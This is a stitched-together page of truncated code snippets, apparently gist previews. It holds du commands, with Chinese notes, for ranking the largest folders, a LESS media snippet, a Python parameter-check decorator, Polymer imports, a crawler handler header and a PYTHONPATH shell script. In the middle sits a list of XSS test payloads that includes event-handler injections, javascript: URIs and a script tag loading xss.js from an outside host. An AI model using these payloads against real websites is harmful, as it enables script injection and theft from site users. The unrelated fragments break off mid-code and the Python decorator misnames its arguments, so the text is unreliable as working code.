###文件夹:
现实所有文件夹的前10
du -a / | sort -n -r | head -n 10
更友好的排名
du -ha / | sort -rh | head -10
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
```less | |
@media: ~'.ccc, .ddd'; | |
.a, | |
.b{ | |
@{media} { | |
color: red; | |
} | |
} |
###文件夹:
现实所有文件夹的前10
du -a / | sort -n -r | head -n 10
更友好的排名
du -ha / | sort -rh | head -10
def not_empty(*params,**kkargs): | |
if (params is None or params == []) and len(kargs) == 0: | |
raise Exception("You should give me some params;") | |
def wrapper(f): | |
@wraps(f) | |
def wrapped(*args,**kargs): | |
for p in params: | |
if g.args.get(p,'') == '': | |
return error(CODE.COMMON.PARAM_NOT_EMPTY,"参数不存在:%s"%p) | |
for k,v in kkargs.iteritems(): |
<link rel="import" href="../chart-js/chart-js.html"> | |
<link rel="import" href="../paper-progress/paper-progress.html"> | |
<link rel="import" href="../core-icons/core-icons.html"> | |
<link rel="import" href="../core-icons/av-icons.html"> | |
<link rel="import" href="../paper-fab/paper-fab.html"> | |
<link rel="import" href="../paper-input/paper-input.html"> | |
<polymer-element name="my-element"> | |
<template> |
#!/usr/bin/env python | |
# -*- encoding: utf-8 -*- | |
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8: | |
# Created on 2014-02-28 00:15:53 | |
from libs.pprint import pprint | |
from libs.base_handler import * | |
class Handler(BaseHandler): | |
''' |
#!/usr/bin/env sh | |
if [ ! $PYTHONPATH ];then | |
PYTHONPATH="$HOME" | |
else | |
export PYTHONPATH="$PYTHONPATH:$HOME" | |
fi | |
BASE=$(pwd) | |
cd "$(dirname "$1")" |